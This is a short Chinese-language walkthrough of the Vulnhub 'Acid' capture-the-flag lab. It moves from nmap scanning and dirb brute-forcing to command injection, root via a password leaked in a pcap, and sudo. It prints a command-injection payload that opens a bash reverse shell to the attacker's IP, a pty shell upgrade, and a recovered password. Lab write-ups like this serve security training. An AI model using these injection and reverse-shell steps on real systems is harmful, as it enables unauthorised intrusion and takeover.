Vulnhub之Acid实战

1、发现主机
使用nmap对内网进行扫描,发现主机

nmap -sP 192.168.340/24

在这里插入图片描述
2、扫描端口
用nmap扫描目标主机,发现只有33447端口开启,http端口

nmap -sV -p0-65535 192.168.34.151

在这里插入图片描述
3、扫描网站目录并进行爆破

dirb http://192.168.34.151:33447

在这里插入图片描述
发现Challenge目录,进行目录爆破
在这里插入图片描述
访问可正常显示的页面
http://192.168.34.151/Challenge/cake.php => /Magic_Box
继续爆破
在这里插入图片描述
3、漏洞挖掘
命令注入:
http://192.168.34.151:33447/Challenge/Magic_Box/command.php
在这里插入图片描述
4、反弹shell
192.168.34.179 && echo ‘bash -i >& /dev/tcp/192.168.34.179/1122 0>&1’ | bash(192.168.34.179为攻击机卡里的IP地址)
在这里插入图片描述
获取交互式shell

python -c 'import pty;pty.spawn("/bin/sh")'

在这里插入图片描述
5、提权
cat /etc/passwd发现几个用户:acid,saman,root
find / -user acid 2 >/dev/null
发现一个hint.pcapng
使用wireshark然后追踪tcp流
在这里插入图片描述
发现saman的密码:1337hax0r
su提权到saman
在使用sudo -i提权到root,获得flag
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值